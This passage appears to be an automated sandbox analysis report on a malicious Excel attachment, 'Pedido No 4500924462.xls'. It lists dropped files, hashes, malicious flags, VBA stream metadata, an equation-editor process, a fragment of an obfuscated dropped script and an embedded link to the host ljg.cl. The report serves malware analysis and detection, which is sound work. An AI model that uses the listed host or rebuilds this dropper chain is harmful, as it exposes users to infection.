                                                                      Entropy (8bit):4.678531200055012
                                                                      Encrypted:false
                                                                      SSDEEP:3:bDp7FCWZ6BKFrKF2VVcbYmMJKFrKF2VVcbYv:bBs2xFeFyVeKEFeFyVeC
                                                                      MD5:465087A3A559708B14EB51ED601B1D60
                                                                      SHA1:408F3B620CC8051251E3A088EC37A9F1E9C0A601
                                                                      SHA-256:1E7E602BC27892E2F6CC096C102E9F45EB1EA81CAAA401041268777EB8C34F38
                                                                      SHA-512:80318650702C579C3200DA294DAD22A2C0EE5756E475DCC95539EA2B6A79DEF572FA77FAD785A2E033087EABFC7BD6A1A5003199F06F2F002F19249536703C32
                                                                      Malicious:false
                                                                      Preview:[folders]..ljg.cl.url=0..Pedido No 4500924462.LNK=0..[xls]..Pedido No 4500924462.LNK=0..
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<https://ljg.cl/>), ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):41
                                                                      Entropy (8bit):4.473048041045147
                                                                      Encrypted:false
                                                                      SSDEEP:3:HRAbABGQYm2fX7JKovn:HRYFVm4oyn
                                                                      MD5:95A28637A1B596EF9631114025666A22
                                                                      SHA1:24B2353EB74594410C1F2A11C9ED789C8087C6A1
                                                                      SHA-256:8A6654BA79E70732CD9E106F90A7AE728D1B870398963ECFEBD4C07E01C8E93F
                                                                      SHA-512:8A7FFD99105BB4357A612F341A86AACFD008BFFE943F6F7DB016A41FCC2277524CF445E2DBD8F0D737C47E499EB08A846B3155ABC4F91FB014DBD4E917DB9441
                                                                      Malicious:true
                                                                      Preview:[InternetShortcut]..URL=https://ljg.cl/..
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):162
                                                                      Entropy (8bit):2.503835550707525
                                                                      Encrypted:false
                                                                      SSDEEP:3:vrJlaCkWtVywgmbVWtUykLC+ln:vdsCkWt3gmoUyd+l
                                                                      MD5:B37CE9E8345F9558D8E3AFB62D07B0DF
                                                                      SHA1:99057A85C270AC5FACCB9F49E1FEA3E73B1BC5BD
                                                                      SHA-256:B0542FB818F2CBEA824C83BE01289ED036D9BDF164970A75B018F43E26547FA4
                                                                      SHA-512:88C7BEFCBB413DA42095ADFFF91AA82350181FF6162718D0A98B4A2E6D472499B3647C3E33A119326A134AA96D9D97984E73695F1D4C59F29F06484E2CAC325F
                                                                      Malicious:false
                                                                      Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (431), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):164934
                                                                      Entropy (8bit):3.909751863320666
                                                                      Encrypted:false
                                                                      SSDEEP:3072:tfSbgch/i6M5Cde7vL5vyaGuBfSbgch/i6M5Cde7vL5gfSbgch/i6M5Cde7vL51:tfSbjhZdQL5tfSbjhZdQL5gfSbjhZdQf
                                                                      MD5:B9765F41CF6B094C309E61D92530447F
                                                                      SHA1:A708DD6C737B06BF842D7933AAC106BB97AA60D3
                                                                      SHA-256:1168E97D0CCBC4A68C3BFA7C420D9BBDB2D985B225109E9FF6D4558AA0BE2BB5
                                                                      SHA-512:8AA37821D21CA75EB4F721A3285417C798597DDAD958A5AB620A3EF2A3968433BB6CF91F2E237CEEADB0C55AC9EDA87CA60D7F203074768F82CDDF25F4226192
                                                                      Malicious:true
                                                                      Preview:..........W.L.L.P.Q.B.K.Z.R.f.U.W.L.R.k. .=. .".O.J.e.z.u.W.z.x.L.i.z.b.h.N.a.".....W.r.L.W.G.e.K.c.q.f.l.u.K.t.x. .=. .".W.W.k.p.K.p.A.L.i.i.u.d.G.e.W.".....z.K.T.k.K.i.l.h.O.t.p.l.e.R.A. .=. .".U.G.G.t.K.s.N.i.G.x.u.L.B.W.I.".....i.h.e.n.l.c.e.K.L.L.L.h.j.A.v. .=. .".s.W.L.q.i.c.L.C.K.P.G.P.N.i.n.".....L.p.c.L.h.C.m.n.b.W.K.P.L.L.K. .=. .".I.K.n.p.K.f.L.m.N.u.f.L.r.f.B.".....B.U.p.z.W.W.N.z.p.d.W.L.U.P.L. .=. .".G.L.f.L.l.d.N.a.L.Z.G.l.U.L.d.".........i.K.U.O.C.j.K.o.K.L.b.e.p.K.L. .=. .".p.L.W.W.o.G.J.i.x.S.u.U.G.n.P.".....z.m.z.e.O.G.c.R.c.h.A.x.B.m.t. .=. .".f.Z.B.d.c.L.O.n.n.i.o.c.z.a.G.".....c.W.W.t.U.C.a.I.k.U.i.f.K.A.W. .=. .".f.p.k.L.h.W.Z.h.S.P.K.i.O.K.b.".........i.K.s.L.U.e.n.m.i.k.C.i.A.h.U. .=. .".B.Z.x.k.T.G.U.T.e.S.W.i.H.f.T.".....f.B.O.i.u.b.B.K.c.t.B.G.c.U.L. .=. .".P.T.f.A.i.N.l.Z.h.N.A.T.U.g.A.".....P.b.q.O.u.p.a.z.K.K.Z.A.K.Z.r. .=. .".h.u.L.l.k.l.W.G.S.L.W.A.Z.a.J.".....K.o.q.N.c.c.j.m.l.U.Z.S.k.K.B. .=. .".U.G.Z.W.u.K.b.o.o.O.c.W.Z.e.r.".....U.a.b.k.K.z.c.L.U.Z.
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 27 16:56:45 2024, Security: 1
                                                                      Category:dropped
                                                                      Size (bytes):246272
                                                                      Entropy (8bit):7.946723019450002
                                                                      Encrypted:false
                                                                      SSDEEP:6144:/Au6XnezAUG0xQvkyXxzYztZAZv0NHtzJCR:dYulwckWH5U
                                                                      MD5:F971B73060C51565F2877697065DD19B
                                                                      SHA1:CE7CF4222C6B364439421E7CBF7B5AC8302212ED
                                                                      SHA-256:7B2B5DE6D84229E0F38E1BA15D60CBEE672AC87C060BA7556AC1EAE3154BBD18
                                                                      SHA-512:A1B9A7B5B65977D9551F12A5E7E7856238DFA584DDACBD10CFCDC82BC417BF6A6DB9AC8F7AA806BD100456116237BEEB475F2240A8831D10DA0725F91B099553
                                                                      Malicious:false
                                                                      Preview:......................>...................................$...................f.......h................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...............G...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...&...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...g.......h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:false
                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 27 16:56:45 2024, Security: 1
                                                                      Category:dropped
                                                                      Size (bytes):246272
                                                                      Entropy (8bit):7.946723019450002
                                                                      Encrypted:false
                                                                      SSDEEP:6144:/Au6XnezAUG0xQvkyXxzYztZAZv0NHtzJCR:dYulwckWH5U
                                                                      MD5:F971B73060C51565F2877697065DD19B
                                                                      SHA1:CE7CF4222C6B364439421E7CBF7B5AC8302212ED
                                                                      SHA-256:7B2B5DE6D84229E0F38E1BA15D60CBEE672AC87C060BA7556AC1EAE3154BBD18
                                                                      SHA-512:A1B9A7B5B65977D9551F12A5E7E7856238DFA584DDACBD10CFCDC82BC417BF6A6DB9AC8F7AA806BD100456116237BEEB475F2240A8831D10DA0725F91B099553
                                                                      Malicious:true
                                                                      Preview:......................>...................................$...................f.......h................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...............G...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...&...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...g.......h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Nov 26 16:24:49 2024, Security: 1
                                                                      Entropy (8bit):7.873722803838912
                                                                      TrID:
                                                                      • Microsoft Excel sheet (30009/1) 47.99%
                                                                      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                      File name:Pedido No 4500924462.xls
                                                                      File size:240'128 bytes
                                                                      MD5:456ff43e8b42a2043afc83c4474872d5
                                                                      SHA1:a18cb477550dc4eda2e5f0d22b2ffb5a71dbeb13
                                                                      SHA256:ae99e5fea931ceed4641e248fc8f06fb314d4c12111b92871e6bf45c69d93188
                                                                      SHA512:9293ac9a536c2fb507c7bc50c1c4dcebaf680df263bf89cb0758df60c45c26c2e7aed657252a606259b0b0ba58e00ea70a198d6a9a1b6ddd3896decae9558ac0
                                                                      SSDEEP:6144:CAu6uXDABZG5pTKZr7EHhFLkNYRIfC+I3:SDABsEtNYRS
                                                                      TLSH:B834121C7276C101E6A64A3C1ED4C2D7A6B4FC9AEF0EC61B3294771F8D3B49299435CA
                                                                      File Content Preview:........................>...................................$...................g.......i......................................................................................................................................................................
                                                                      Icon Hash:276ea3a6a6b7bfbf
                                                                      Document Type:OLE
                                                                      Number of OLE Files:1
                                                                      Has Summary Info:
                                                                      Application Name:Microsoft Excel
                                                                      Encrypted Document:True
                                                                      Contains Word Document Stream:False
                                                                      Contains Workbook/Book Stream:True
                                                                      Contains PowerPoint Document Stream:False
                                                                      Contains Visio Document Stream:False
                                                                      Contains ObjectPool Stream:False
                                                                      Flash Objects Count:0
                                                                      Contains VBA Macros:True
                                                                      Code Page:1252
                                                                      Author:
                                                                      Last Saved By:
                                                                      Create Time:2006-09-16 00:00:00
                                                                      Last Saved Time:2024-11-26 16:24:49
                                                                      Creating Application:Microsoft Excel
                                                                      Security:1
                                                                      Document Code Page:1252
                                                                      Thumbnail Scaling Desired:False
                                                                      Contains Dirty Links:False
                                                                      Shared Document:False
                                                                      Changed Hyperlinks:False
                                                                      Application Version:786432
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                      VBA File Name:Sheet1.cls
                                                                      Stream Size:977
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0 .
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 86 89 8c d4 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Attribute VB_Name = "Sheet1"
                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                      Attribute VB_GlobalNameSpace = False
                                                                      Attribute VB_Creatable = False
                                                                      Attribute VB_PredeclaredId = True
                                                                      Attribute VB_Exposed = True
                                                                      Attribute VB_TemplateDerived = False
                                                                      Attribute VB_Customizable = True
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                      VBA File Name:Sheet2.cls
                                                                      Stream Size:977
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] ] . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 86 89 5d 5d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Attribute VB_Name = "Sheet2"
                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                      Attribute VB_GlobalNameSpace = False
                                                                      Attribute VB_Creatable = False
                                                                      Attribute VB_PredeclaredId = True
                                                                      Attribute VB_Exposed = True
                                                                      Attribute VB_TemplateDerived = False
                                                                      Attribute VB_Customizable = True
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                      VBA File Name:Sheet3.cls
                                                                      Stream Size:977
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 86 89 0d c1 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Attribute VB_Name = "Sheet3"
                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                      Attribute VB_GlobalNameSpace = False
                                                                      Attribute VB_Creatable = False
                                                                      Attribute VB_PredeclaredId = True
                                                                      Attribute VB_Exposed = True
                                                                      Attribute VB_TemplateDerived = False
                                                                      Attribute VB_Customizable = True
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                      VBA File Name:ThisWorkbook.cls
                                                                      Stream Size:985
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . < - . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 86 89 3c 2d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Attribute VB_Name = "ThisWorkbook"
                                                                      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                      Attribute VB_GlobalNameSpace = False
                                                                      Attribute VB_Creatable = False
                                                                      Attribute VB_PredeclaredId = True
                                                                      Attribute VB_Exposed = True
                                                                      Attribute VB_TemplateDerived = False
                                                                      Attribute VB_Customizable = True
                                                                      General
                                                                      Stream Path:\x1CompObj
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:114
                                                                      Entropy:4.25248375192737
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      General
                                                                      Stream Path:\x5DocumentSummaryInformation
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:244
                                                                      Entropy:2.889430592781307
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                      General
                                                                      Stream Path:\x5SummaryInformation
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:200
                                                                      Entropy:3.2696169807235007
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . @ . . . . . . . . .
                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                      General
                                                                      Stream Path:MBD0006D5B9/\x1CompObj
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:99
                                                                      Entropy:3.631242196770981
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      General
                                                                      Stream Path:MBD0006D5B9/Package
                                                                      CLSID:
                                                                      File Type:Microsoft Excel 2007+
                                                                      Stream Size:16804
                                                                      Entropy:7.59049937623385
                                                                      Base64 Encoded:True
                                                                      Data ASCII:P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      General
                                                                      Stream Path:MBD0006D5BA/\x1Ole
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:672
                                                                      Entropy:4.568201476729664
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . E . 4 M . . . . . . . . . . . . . . . . y . . . K . . . . . h . t . t . p . s . : . / . / . l . j . g . . . c . l . / . m . w . o . I . ? . & . p . u . t . = . s . t . r . a . i . g . h . t . & . g . l . i . d . e . r . = . b . a . w . d . y . & . m . i . c . e . = . a . c . c . u . r . a . t . e . & . i . c . e . b . r . e . a . k . e . r . = . q . u . e . s . t . i . o . n . a . b . l . e . & . r . i . v . e . r . b . e . d . = . o . r . a . n . g . e . & . s . l . i . c . e . . . q . S . O Z 9
                                                                      Data Raw:01 00 00 02 45 90 a6 02 34 97 ac 4d 00 00 00 00 00 00 00 00 00 00 00 00 0a 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 06 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 6c 00 6a 00 67 00 2e 00 63 00 6c 00 2f 00 6d 00 77 00 6f 00 49 00 3f 00 26 00 70 00 75 00 74 00 3d 00 73 00 74 00 72 00 61 00 69 00 67 00 68 00 74 00 26 00 67 00 6c 00 69 00 64 00 65 00 72 00
                                                                      General
                                                                      Stream Path:Workbook
                                                                      CLSID:
                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                      Stream Size:207220
                                                                      Entropy:7.99733421223463
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . ' H . . . G H j . . ^ . . = - . . O h \\ $ . . # ) . ^ b W D . K . B . . . . . . . . . . . \\ . p . . _ x Z F v . . . p 4 o # N Z . o u X . B 0 . B ~ . F ` . . N ( 1 . . ^ . . . . V 9 . . R E } H . B 5 3 . . ^ Q \\ G " H V W [ 5 B . . . = a . . . m . . . = . . . . . . . F ^ , f . . @ = . . . U N . . . . L : . . . . . . . . . . . . . . . . . u . = . . . 5 $ j * o m S . . W l @ . . . / . . . . b " . . . . . . . } i . . . . . . . ^ 1 . . . . 8 D . . k W D
                                                                      Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 27 48 04 e3 05 2e 83 47 48 6a bb fd bc 18 19 5e 09 d1 97 3d 2d 05 7f 82 4f 68 5c 24 0f 19 23 29 dd d7 b2 5e 62 c3 57 44 7f 99 4b cc b2 fb e0 42 e1 00 02 00 b0 04 c1 00 02 00 91 17 e2 00 00 00 5c 00 70 00 8b fc c8 90 5f b1 78 5a 46 d5 76 09 d5 bb 20 1e 70 34 ad 6f 23 c4 4e b4 5a 08 ce 6f 75 8a
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                      CLSID:
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Stream Size:529
                                                                      Entropy:5.223299254457375
                                                                      Base64 Encoded:True
                                                                      Data ASCII:I D = " { 8 4 9 6 C D 3 2 - D 6 5 9 - 4 5 A F - 8 F 5 7 - 2 D E 8 A D F 9 F F 3 4 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C 6 C 4 D 9 E 5 D 9 E D D B F 1 D
                                                                      Data Raw:49 44 3d 22 7b 38 34 39 36 43 44 33 32 2d 44 36 35 39 2d 34 35 41 46 2d 38 46 35 37 2d 32 44 45 38 41 44 46 39 46 46 33 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:104
                                                                      Entropy:3.0488640812019017
                                                                      Base64 Encoded:False
                                                                      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                      Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:2644
                                                                      Entropy:3.9953773243770323
                                                                      Base64 Encoded:False
